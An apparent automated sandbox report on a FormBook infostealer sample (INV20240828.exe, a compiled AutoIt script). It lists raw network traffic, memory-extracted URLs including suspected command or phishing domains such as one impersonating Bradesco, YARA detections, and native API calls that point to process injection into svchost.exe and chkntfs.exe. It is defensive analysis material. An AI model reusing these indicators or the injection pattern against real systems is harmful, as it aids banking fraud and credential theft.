12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 b5 5c c9 a5 8e 51 ca 7e 46 ba 8a b6 46 db 70 45 db b4 9d cc 29 45 e9 ed 55 a2 e0 c9 44 32 44 af 52 63 42 67 99 82 6d 6a a8 9f 28 da 56 c9 98 b8 ea da 93 4e 91 12 0e 17 71 aa 1f d4 5a a0 0a fc a0 4e c5 89 98 6c 0b 27 13 3d 20 5d b5 1d 4d aa 3a 6a 25 53 70 a8 7a 4d c2 6b 54 9a 34 e3 b6 19 7a 9a 54 2a d3 44 01 66 e1 d7 99 ca b4 78 9e 28 19 8e cb 40 4a 7c 09 64 25 66 57 32 81 4c c9 a0 a6 e6 52 36 5b 51 35 cd b0 26 32 00 01 8f 04 0e 7e 13 d6 b9 e1 c0 bc 6a 9a 3c 4c 77 b2 0c a4 cf 48 10 2e 53 0d 8b 3a e4 30 98 54 b0 19 b3 cb dc 96 c8 0f 37 dd 23 dc 33 e9 04 b5 b4 84 65 4b 74 ba a2 5a 9a 04 c0 2d 37 52 e8 03 3a 02 c2 dc 99 6c 98 60 08 12 ca 24 09 02 e8 85 00 99 0d 08 4d f3 9f 6c 28 8b ba 0a e9 87 4f 21 7f 35 e2 04 f0 94 25 5d 9c ea 68 fe 22 dc 03 f3 60 40 cd 98 86 75 2d ae 66 a6 0c d7 60 54 0b 4d 29 4a df c8 e8 a8 28 af 28 00 57 d1 ed 29 ea cc 62 a5 4a 1a 2d da 8e ca 0c db ca 58 b6 45 11 52 4f ce b6 cd a4 78 8a c3 e0 c2 ca 18 05 68 94 4c 45 24 93 bc 9e 0f 4b 0e 0d 85 35 a4 a7 0f 08 63 e5 04 c2 41 6d 00 71 21 7e 44 ab e7 80 56 aa 43 0b 93 a0 00 55 9f 9d d2 a1 8f 21 ac aa a1 31 3d 33 d0 db 1d c2 63 42 10 3b 2c a1 5e d0 48 75 13 f1 2b cb 43 0d 1a 30 c6 1c 5a 98 2c ea 94 91 8b 63 b1 78 d8 8f 91 fe 23 5d d0 30 bc e3 90 82 82 5a bc 36 e1 e0 30 80 2a e3 77 cf 0c f5 f7 7d 98 e2 ee 60 dd 51 8b cd 86 8c 70 2f 52 dd d9 8a 0d 89 42 be 1d 6a 02 f1 53 9c f3 44 47 b5 c6 b1 4f 11 a0 5d c0 b3 6d 7b 99 53 68 ff 70 a8 bc 7c a1 9e 5a a1 22 b3 c7 18 ec 40 27 95 a8 ab 22 27 3c 10 8d 42 ff 98 ae 64 d2 12 0b d8 4d 9f e9 ce 96 4c 5b 65 19 bc 19 10 2d 39 7c ce 40 88 98 8d 50 8b df 0c d4 7a d3 07 d4 b0 0a 01 a5 9a d1 0d 4d a3 16 57 83 31 07 77 af c2 7f 17 38 8a 24 f3 aa 2e c6 58 12 22 2a 1b 96 14 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: wts/1.7.0Date: Fri, 30 Aug 2024 07:19:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: privateStrict-Transport-Security: max-age=31536000Data Raw: 31 33 30 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 e8 af a6 e7 bb 86 e9 94 99 e8 af af 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 30 Aug 2024 07:20:24 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-30T07:20:29.8694509Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 30 Aug 2024 07:20:27 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-08-30T07:20:29.8694509Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 30 Aug 2024 07:20:29 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-30T07:20:34.9486025Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 30 Aug 2024 07:20:32 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-30T07:20:37.4784443Z
            Source: chkntfs.exe, 00000005.00000002.4506411115.0000000005C82000.00000004.10000000.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.0000000003642000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?KxdLgNi=2UIJc9LRnkw4J/ss8vEg5cKBRK5CPFs/WFWPir8W
            Source: chkntfs.exe, 00000005.00000002.4506411115.0000000005184000.00000004.10000000.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.0000000002B44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2690302311.000000002A7E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725002238.0041500934&other_args=eyJ1cmkiOiAiL
            Source: chkntfs.exe, 00000005.00000002.4506411115.00000000062CA000.00000004.10000000.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.0000000003C8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.dfbio.net:80/yzen/?KxdLgNi=O9V9WpJA2Id3CQ8RbCyxNyy8YHr
            Source: umoPQplhJOFey.exe, 00000006.00000002.4507474267.0000000004C1A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.golbasi-nakliyat.xyz
            Source: umoPQplhJOFey.exe, 00000006.00000002.4507474267.0000000004C1A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.golbasi-nakliyat.xyz/gxi9/
            Source: firefox.exe, 00000008.00000002.2690302311.000000002A7E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www70.clientebradesco.online/
            Source: chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: chkntfs.exe, 00000005.00000002.4504718560.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: chkntfs.exe, 00000005.00000002.4504718560.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: chkntfs.exe, 00000005.00000002.4504718560.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: chkntfs.exe, 00000005.00000002.4504718560.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033#
            Source: chkntfs.exe, 00000005.00000002.4504718560.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: chkntfs.exe, 00000005.00000002.4504718560.0000000002A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: chkntfs.exe, 00000005.00000003.2578666245.00000000079B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: chkntfs.exe, 00000005.00000002.4506411115.0000000005316000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4508445951.0000000007730000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4506411115.000000000595E000.00000004.10000000.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.000000000331E000.00000004.00000001.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.0000000002CD6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4504655296.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2403022417.00000000070F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4505559577.0000000002DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4504355624.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4507474267.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4505524370.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2396873201.0000000003FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4504655296.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2403022417.00000000070F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4505559577.0000000002DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4504355624.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4507474267.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4505524370.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2396873201.0000000003FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: INV20240828.exe, 00000000.00000000.2044096553.0000000000112000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c0c5ca28-5
            Source: INV20240828.exe, 00000000.00000000.2044096553.0000000000112000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b065c799-a
            Source: INV20240828.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f644f7ff-6
            Source: INV20240828.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a859a36d-9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C973 NtClose,2_2_0042C973
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,2_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74340 NtSetContextThread,2_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73090 NtSetValueKey,2_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73010 NtOpenDirectoryObject,2_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74650 NtSuspendThread,2_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BE0 NtQueryValueKey,2_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B80 NtQueryInformationFile,2_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BA0 NtEnumerateValueKey,2_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AD0 NtReadFile,2_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AF0 NtWriteFile,2_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AB0 NtWaitForSingleObject,2_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C739B0 NtGetContextThread,2_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FE0 NtCreateFile,2_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F90 NtProtectVirtualMemory,2_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FA0 NtQuerySection,2_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FB0 NtResumeThread,2_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F60 NtCreateProcessEx,2_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F30 NtCreateSection,2_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E80 NtReadVirtualMemory,2_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EA0 NtAdjustPrivilegesToken,2_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DD0 NtDelayExecution,2_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DB0 NtEnumerateKey,2_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D70 NtOpenThread,2_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D00 NtSetInformationFile,2_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D10 NtOpenProcessToken,2_2_03C73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D30 NtUnmapViewOfSection,2_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CC0 NtQueryVirtualMemory,2_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CA0 NtQueryInformationToken,2_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C60 NtCreateKey,2_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C00 NtQueryInformationProcess,2_2_03C72C00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E35C0 NtCreateMutant,LdrInitializeThunk,5_2_047E35C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E4650 NtSuspendThread,LdrInitializeThunk,5_2_047E4650
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E4340 NtSetContextThread,LdrInitializeThunk,5_2_047E4340
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_047E2C70
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2C60 NtCreateKey,LdrInitializeThunk,5_2_047E2C60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_047E2CA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_047E2D30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_047E2D10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_047E2DF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2DD0 NtDelayExecution,LdrInitializeThunk,5_2_047E2DD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_047E2EE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_047E2E80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2F30 NtCreateSection,LdrInitializeThunk,5_2_047E2F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2FE0 NtCreateFile,LdrInitializeThunk,5_2_047E2FE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2FB0 NtResumeThread,LdrInitializeThunk,5_2_047E2FB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E39B0 NtGetContextThread,LdrInitializeThunk,5_2_047E39B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2AF0 NtWriteFile,LdrInitializeThunk,5_2_047E2AF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2AD0 NtReadFile,LdrInitializeThunk,5_2_047E2AD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2B60 NtClose,LdrInitializeThunk,5_2_047E2B60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_047E2BF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047E2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_047E2BE0
